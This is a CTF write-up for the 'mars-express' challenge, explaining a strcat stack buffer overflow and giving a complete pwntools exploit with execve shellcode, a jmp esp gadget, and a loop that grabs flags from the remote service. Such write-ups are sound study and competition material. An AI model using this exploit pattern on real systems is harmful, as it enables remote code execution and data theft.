CTFtime.org

mars-express

by korniltsev / Corrupted Pwnis

Rating:

The bug is stack buffer overflow ith strcat at 0x08049A07
If you hit menu 2 you can enter the name of a train. It is up to 500 bytes long.
```
void __noreturn menu_show()
{
char name[500]; // [esp+8h] [ebp-200h]
int v1; // [esp+1FCh] [ebp-Ch]

printw("Give me the name of the train: ");
read_string(name, 500);
```

Later the name is strcat'ed on the much smaller buffer.
```
signed int __cdecl show_train(char *name)
{
char *v1; // eax
char v3[47]; // [esp+9h] [ebp-3Fh]
char *v4; // [esp+38h] [ebp-10h]
char *s; // [esp+3Ch] [ebp-Ch]

strcpy(v3, "./data/");
strcat(v3, name); // <<< the bug is here, sbof
v1 = &v3[strlen(v3)];
*(_DWORD *)v1 = 'art.';
*((_WORD *)v1 + 2) = 'ni';
v1[6] = 0;
```
Just send the long name and we contrrol `eip`

```
Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? ()
```
The stack is executable.

rp++ (https://github.com/0vercl0k/rp) finds a handy gadget
```
0x81fff6f: jmp *%esp
```
We put shellcode on the stack and jump to it.

Execute `ls -tr data | tail -n 5` to get the names of the last trains.
Grab the flags with a separate connection for each train.

Final exploit.
```
#!/usr/bin/env python
from pwn import *

def start():
return remote('fd66:666:1::2', 8888)

with start() as io:
io.sendline('2')
shell = b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
pl = b''
pl += b'a' * cyclic_find(b'paaa')
pl += p32(0x81FFF6F)
pl += shell
io.sendline(pl)
io.interactivae()
io.sendline('ls -tr data | tail -n 5; exit;')
res = io.recvall()
trains = re.findall('([a-z0-9A-Z]+)\\.train', res)

for i in trains:
with start() as io:
io.sendline('2')
io.sendline(i)
data = io.recvall()
print data
```

```
_____________________________ ____________________________________________
_,-'/| #### | | #### ||11111111111111111111111111111111111111111111|
_-' | | ||11 FAUST_Xwjk4AABBcb4IaQAAAAAaFpTtaTojQz 111|
(------------------mars-express-------||--------------------------------------------|
\----(o)~~~~(o)----------(o)~~~~(o)--'`-----(o)~~~~(o)--------------(o)~~~~(o)-----'
```

Comments